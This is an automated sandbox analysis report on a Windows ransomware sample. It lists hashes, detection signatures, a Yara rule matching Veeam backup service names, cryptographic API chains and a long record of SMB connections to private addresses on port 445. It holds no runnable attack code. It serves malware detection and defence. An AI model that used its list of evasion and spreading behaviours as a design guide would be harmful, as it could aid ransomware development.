Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
win_gui.exe.exe

Overview

General Information

Sample name:win_gui.exe.exe
(renamed file extension from infected to exe)
Original sample name:win_gui.exe.infected
Analysis ID:1567651
MD5:63e4d0e113333b0bd2af6adb9f06c639
SHA1:34439e3b52a4fea160aee4f52add18d0239bd991
SHA256:41e8d712ef343d367f7f6331a68d6e31ec6830d6f38bec00e72b2915fa697244
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Spreads via windows shares (copies files to share folders)
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • win_gui.exe.exe (PID: 1864 cmdline: "C:\Users\user\Desktop\win_gui.exe.exe" MD5: 63E4D0E113333B0BD2AF6ADB9F06C639)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.win_gui.exe.exe.5c0000.0.unpackINDICATOR_SUSPICOUS_EXE_References_VEEAMDetects executables containing many references to VEEAM. Observed in ransomwareunknown
  • 0x112093:$s1: VeeamNFSSvc
  • 0x11209f:$s9: VeeamTransportSvc
  • 0x11207c:$s10: VeeamDeploymentService

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Machine Learning detection for sample
Source: win_gui.exe.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F4200 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,GlobalMemoryStatus,GetCurrentProcessId,0_2_005F4200
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C7413 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,0_2_005C7413
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F0400 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005F0400
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F0490 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptReleaseContext,0_2_005F0490
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F06D0 CryptExportKey,GetLastError,CryptExportKey,GetLastError,0_2_005F06D0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F0D60 CryptEnumProvidersW,GetLastError,CryptEnumProvidersW,GetLastError,0_2_005F0D60
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F0F80 CryptAcquireContextW,CryptReleaseContext,0_2_005F0F80
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F12E0 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,0_2_005F12E0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F1600 CryptEnumProvidersW,CryptEnumProvidersW,CryptEnumProvidersW,GetLastError,GetLastError,0_2_005F1600
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005EF790 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,0_2_005EF790
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F1870 CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertEnumCertificatesInStore,CertCloseStore,CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005F1870
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005EFA10 CryptCreateHash,GetLastError,CryptSetHashParam,CryptSignHashW,CryptDestroyHash,0_2_005EFA10
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F1B90 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005F1B90
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F1C00 CryptDecrypt,GetLastError,0_2_005F1C00
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C7CCB CryptReleaseContext,0_2_005C7CCB
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C7C96 CryptGenRandom,0_2_005C7C96
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005EFDF0 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,0_2_005EFDF0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F1E90 CryptCreateHash,GetLastError,CryptSetHashParam,CryptSignHashW,CryptDestroyHash,0_2_005F1E90

Exploits

barindex
Connects to many different private IPs (likely to spread or exploit)
Source: global trafficTCP traffic: 192.168.2.148:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.149:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.146:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.147:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.140:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.141:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.144:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.145:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.142:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.143:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.159:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.157:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.158:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.151:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.152:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.150:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.155:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.156:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.153:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.154:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.126:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.247:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.127:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.248:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.124:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.245:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.125:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.246:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.128:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.249:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.129:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.240:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.122:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.243:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.123:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.244:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.120:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.241:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.121:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.242:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.137:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.138:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.135:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.136:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.139:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.250:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.130:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.251:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.133:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.254:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.134:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.131:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.252:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.132:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.253:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.225:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.226:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.223:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.224:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.229:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.227:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.228:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.221:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.222:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.220:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.236:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.237:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.234:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.235:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.238:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.239:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.232:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.233:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.230:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.231:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.203:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.204:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.201:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.202:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.207:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.208:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.205:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.206:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.200:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.209:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.214:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.215:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.212:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.213:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.218:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.219:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.216:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.217:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.210:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.211:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.0:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.180:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.181:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.184:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.185:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.182:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.183:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.188:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.189:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.186:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.187:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.191:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.192:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.190:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.195:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.196:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.193:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.194:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.199:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.197:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.198:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.168:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.169:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.162:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.163:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.160:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.161:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.166:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.167:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.164:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.165:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.170:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.179:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.173:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.174:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.171:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.172:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.177:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.178:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.175:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.176:445Jump to behavior
Connects to many different private IPs via SMB (likely to spread or exploit)
Source: global trafficTCP traffic: 192.168.2.148:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.149:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.146:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.147:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.140:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.141:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.144:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.145:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.142:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.143:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.159:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.157:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.158:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.151:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.152:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.150:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.155:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.156:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.153:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.154:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.126:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.247:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.127:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.248:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.124:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.245:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.125:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.246:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.128:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.249:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.129:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.240:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.122:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.243:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.123:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.244:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.120:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.241:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.121:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.242:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.137:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.138:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.135:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.136:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.139:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.250:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.130:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.251:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.133:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.254:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.134:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.131:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.252:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.132:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.253:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.225:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.226:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.223:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.224:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.229:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.227:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.228:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.221:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.222:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.220:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.236:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.237:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.234:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.235:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.238:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.239:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.232:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.233:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.230:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.231:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.203:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.204:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.201:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.202:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.207:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.208:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.205:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.206:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.200:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.209:445Jump to behavior
